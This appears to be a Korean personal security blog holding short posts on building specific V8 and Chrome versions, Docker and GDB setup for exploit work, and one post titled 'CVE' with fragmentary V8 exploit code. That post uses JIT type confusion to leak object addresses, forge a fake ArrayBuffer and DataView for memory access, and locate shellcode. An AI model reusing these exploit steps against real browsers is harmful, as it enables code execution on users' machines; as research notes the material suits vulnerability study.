# 체크아웃 버전으로 컴파일

## 패치 후 체크아웃

컴파일의 경우 디펜던시가 설치된 상태에서 작업 디렉토리에서 명령 순차적으로 수행 

* fetch v8

* cd v8

* git checkout 1a1a1a1a1a

* gclient sync

``` 

root@0df6d19cd3c1:/hack/v8_5.8.283/v8# git checkout eda659cc5e307f20ac1ad542ba12ab32eaf4c7ef
Checking out files: 100% (7801/7801), done.
Previous HEAD position was 9afecd5f44 Update wasm-spec.
HEAD is now at eda659cc5e Version 5.8.283
root@0df6d19cd3c1:/hack/v8_5.8.283/v8# gclient sync

```

메세지를 보면  HEAD가 변경된 것을 알 수 있다

그래서 컴파일이 제대로 된다

Posted by goldpapa
,

depot_tools와

v8과

chrome은 다르다

특히  v8과 chrome은 버전이 다르니 유의해야 한다

그러지 않으면 삽질한다

Posted by goldpapa
,

CVE

카테고리 없음 2019. 3. 30. 22:59

ab_map_obj 생성

phase 1 : set ab_map_obj[]

ap.proto를 구해서 ab_map_obj에 넣는다

        //alert_log(addr);
        var nop = 0xdaba0000;
        var ab_map_obj = [
                nop,nop,
                0x1f000008,0x000900c0,0x082003ff,0x0,
                nop,nop,   // use ut32.prototype replace it
                nop,nop,0x0,0x0
        ]
        ab_proto_addr = read_obj_addr(ab.__proto__);
        ab_constructor_addr = ab_proto_addr - 0x70;
        alert_log("[.] 1.ab_prot_addr: 0x" + ab_proto_addr.toString(16));
        //sleep(60*1000);
        ab_map_obj[0x6] = ab_proto_addr & 0xffffffff;
        ab_map_obj[0x7] = ab_proto_addr / 0x100000000;
        ab_map_obj[0x8] = ab_constructor_addr & 0xffffffff;
        ab_map_obj[0x9] = ab_constructor_addr / 0x100000000;
0x26e976fd3f78:    0xdaba0000daba0000    0x000900c01f000008
0x26e976fd3f88:    0x00000000082003ff    0x000026e976f95889
0x26e976fd3f98:    0x000026e976f95819    0x0000000000000000

phase 2 : ab_map_obj 의 주소 찾기

gdb에서 0x000900c01f000008 값이 찾아져야 함
change_to_float(ab_map_obj,ab_map_obj_float);
ab_map_obj_addr = read_obj_addr2(ab_map_obj_float) + 0x40

gdb-peda$ find 0x000900c01f000008
Searching for '0x000900c01f000008' in: None ranges
Found 1 results, display max 1 items:
mapped : 0x26e976fd3f80 --> 0x900c01f000008

phase 3 : fake_ab 의 주소 찾기

change_to_float(fake_ab,fake_ab_float);
fake_ab_float_addr = read_obj_addr3(fake_ab_float) + 0x40;

        var fake_ab = [
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                0x0,0x4000, /* buffer length */
                0x12345678,0x123,/* buffer address */
                0x4,0x0
        ]

phase 4 : fake_arraybuffer 오프젝트 만들기

fake_arraybuffer = double_arr42[1];
fake_dv = new DataView(fake_arraybuffer,0,0x4000);

        fake_ab_float_addr_f = d2u(fake_ab_float_addr / 0x100000000,fake_ab_float_addr & 0xffffffff).toString();
        function carry_me_plz_fake(arr){
                for(var i = 0;i < arr.length;i++){
                        var o = arr[i];
                        ttt = o[0];
                }
        }
        eval('function sorry_fake(){1 + valueOf4;double_arr42[0] = 1.1;carry_me_plz_fake(array4);double_arr42[1] = '+fake_ab_float_addr_f+';}')
        for(var i = 0;i < 0x1000;i++){
                carry_me_plz_fake(array3);
        }
        for(var i = 0;i < 0x1000;i++){
                sorry_fake();
        }
        flag = 1;
        sorry_fake();
        //sleep(60)

        fake_arraybuffer = double_arr42[1];

phase 5 : shellcode 주소 찾기

        function read_obj_addr5(object){
                function carry_me_plz(arr,obj){
                        for(var i = 0;i < arr.length;i++){
                                var o = arr[i];
                                o[0] = obj;
                        }
                }
                function sorry(){
                        1 + valueOf5;
                        double_arr52[0] = 1.1;
                        carry_me_plz(array5,object);
                        return double_arr52[0];
                }
                for(var i = 0;i < 0x1000;i++){
                        carry_me_plz(array5,object);
                }
                for(var i = 0;i < 0x1000;i++){
                        sorry();
                }
                flag = 1;
                re = u2d(sorry());
                return re;
        }
Posted by goldpapa
,

 

 

Highlights for New Users - Documentation - iTerm2 - macOS Terminal ...

 

https://www.iterm2.com/documentation-highlights.html

  1.  
  2.  

이 페이지 번역하기

To select text without using the mouse, press cmd-f to open the find field. .... default, but can be enabled under Preferences > Pointer > Focus follows mouse. ... You can automatically change the current session's profile using Automatic Profile ...

 

Posted by goldpapa
,

docker run

카테고리 없음 2019. 3. 30. 08:56

 

docker run -it --name hack_arm_linux2 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -p 2222:22 -v /Users/lili/hack/docker/ubuntu1804/hack:/hack hack_arm:2

 

Posted by goldpapa
,

https://github.com/hugsy/gef

 

hugsy/gef

GEF - GDB Enhanced Features for exploit devs & reversers - hugsy/gef

github.com

https://github.com/longld/peda

 

longld/peda

PEDA - Python Exploit Development Assistance for GDB - longld/peda

github.com

 

Posted by goldpapa
,

sudo dpkg --add-architecture i386

sudo apt-get update

sudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386

 

 

 

https://askubuntu.com/questions/454253/how-to-run-32-bit-app-in-ubuntu-64-bit

Posted by goldpapa
,

https://docs.vmware.com/kr/VMware-Tools/10.2.0/com.vmware.vsphere.vmwaretools.doc/GUID-08BB9465-D40A-4E16-9E15-8C016CC8166F.html

'WHAT' 카테고리의 다른 글

크롬 컴파일  (0) 2019.03.29
[ref] Curve cryptosystem parameters  (0) 2016.10.04
pwn-pwnable [ringzer0team]  (0) 2015.06.14
chal_rpc-pwnable [ringzer0team]  (0) 2015.06.11
ask_grandpapa-coding [ringzer0team]  (0) 2015.06.11
Posted by goldpapa
,

크롬 컴파일

WHAT 2019. 3. 29. 23:36

크롬 컴파일

크롬 버전 확인

https://en.wikipedia.org/wiki/Google_Chrome_version_history

크롬 패치 확인

chrome github commit + chrome v8 engine version

DEPOT 툴 설치

https://commondatastorage.googleapis.com/chrome-infra-docs/flat/depot_tools/docs/html/depot_tools_tutorial.html#_setting_up

git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git
export PATH=$PATH:/path/to/depot_tools

소스 다운로드, 체크아웃

https://v8.dev/docs/source-code

mkdir ~/v8
cd ~/v8
fetch v8
cd v8
git checkout -b 1a1a1a1a1a
* 1a1a1a1a1a 는 크로미움의 버전이 아니라 v8의 커밋 버전임(주의)
* 크로미움 버전 : 63.0.3239
* (Linux, macOS, and Windows)    Blink 537.36    
* v8 버전 : 6.3.292

디펜던시 설치

cd ~/v8/v8 && ./build/install-build-deps.sh
gclient sync

컴파일 환경 설정

https://v8.dev/docs/build

tools/dev/v8gen.py list
tools/dev/v8gen.py ia32.release

빌드

https://v8.dev/docs/build-gn

ninja -C out/x64.release : 전체 빌드 약 1300개
ninja -C out/x64.release d8 : d8만 빌드 약 900개, 대략 1시간 소요
[참조]
root@0df6d19cd3c1:/hack/v8/v8# tools/dev/v8gen.py x64.debug
root@0df6d19cd3c1:/hack/v8/v8# ninja -C out.gn/x64.debug
ninja: Entering directory `out.gn/x64.debug'
[15/1390] CXX obj/simple_fuzzer/fuzzer.o^C
ninja: build stopped: interrupted by user.
root@0df6d19cd3c1:/hack/v8/v8# ninja -C out.gn/x64.debug d8
ninja: Entering directory `out.gn/x64.debug'
[21/966] CXX obj/v8_libplatform/trace-config.o

'WHAT' 카테고리의 다른 글

vmware tool 수동 설치 ubuntu server 18.04  (0) 2019.03.29
[ref] Curve cryptosystem parameters  (0) 2016.10.04
pwn-pwnable [ringzer0team]  (0) 2015.06.14
chal_rpc-pwnable [ringzer0team]  (0) 2015.06.11
ask_grandpapa-coding [ringzer0team]  (0) 2015.06.11
Posted by goldpapa
,

맥에서 zsh 로 이쁘게


https://beomi.github.io/2017/07/07/Beautify-ZSH/

Posted by goldpapa
,